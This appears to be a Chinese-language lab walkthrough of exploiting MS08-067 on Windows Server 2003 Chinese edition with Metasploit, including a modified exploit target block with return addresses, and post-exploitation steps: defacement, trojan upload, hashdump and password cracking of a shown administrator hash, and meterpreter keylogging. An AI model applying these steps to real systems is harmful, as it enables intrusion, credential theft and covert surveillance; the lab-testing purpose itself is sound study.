一、测试环境
攻击机:kali(NMAP+MSF)
靶机:windows server 2003 SP2 中文版
利用漏洞:MS08_067
二、漏洞描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码,可用于进行蠕虫攻击。受影响的系统有 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 。
三、目标渗透
1、Nmap信息收集,目标开放445端口,可能存在ms08_067漏洞。
尝试使用MSF的攻击模块ms08_067_netapi.rb进行攻击,试了几遍之后没成功。根据返回的信息知道目标是windows server 2003 中文版,然后切换到已下目录:/usr/share/metasploit-framework/modules/exploits/windows/smb
找到ms08_067_netapi.rb文件,仔细看了一遍果然没有关于中文版的攻击代码。
于是找度娘,最后借鉴了一位大佬的文章,对攻击模块稍作修改。
对原文件做备份:
在ms08_067_netapi_ser2003_zh.rb中增加以下代码,其实就是修改了四个跳转指针地址(举一反三,其他系统。。。)。
['Windows 2003 SP2 Chinese (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3)
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4)
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
如图所示:
通过search命令查找模块并使用模块
输入info查看模块的详细信息,发现增加了第65行的内容。
先show options 然后设置目标IP以及payload
输入exploit进行攻击,发现无法识别语言。
于是设定target
好了,又出现新的问题,提示是之前的攻击让目标系统崩溃了。
尝试重启目标主机,执行相同操作,攻击成功。
系统权限
尝试echo一个简单文件,挂个的黑页
成功了
找到网站的数据库,我这提供两种思路进行脱裤。
输入back回退到meterpreter界面。
1、切换到网站的跟目录,直接echo或者upload一个木马文件,然后通过浏览器连接进行脱裤。
2、输入hashdump获取目标主机的所有用户密码的哈希值,然后解密获得明文,直接远程登录进行脱裤。
3、注:目标主机若未开启3389端口请参照:https://www.cnblogs.com/panisme/p/8341970.html
copy这段hash值:32ed87bdb5fdc5e9cba88547376818d4到https://www.somd5.com/上解密,
得到administrator的密码明文,如下图所示:
当然meterpreter的功能远不止这些,还有键盘记录截屏等等。。。
以下是键盘记录测试:
先ps查看目标主机正在运行的进程信息。
接着用migrate + PID 绑定相应的进程。
使用keyscan_start启动键盘监听,keyscan_dump打印获取到的内容,最后输入keyscan_stop来结束键盘监听。
****************
四、参照:https://bbs.pediy.com/thread-186737.htm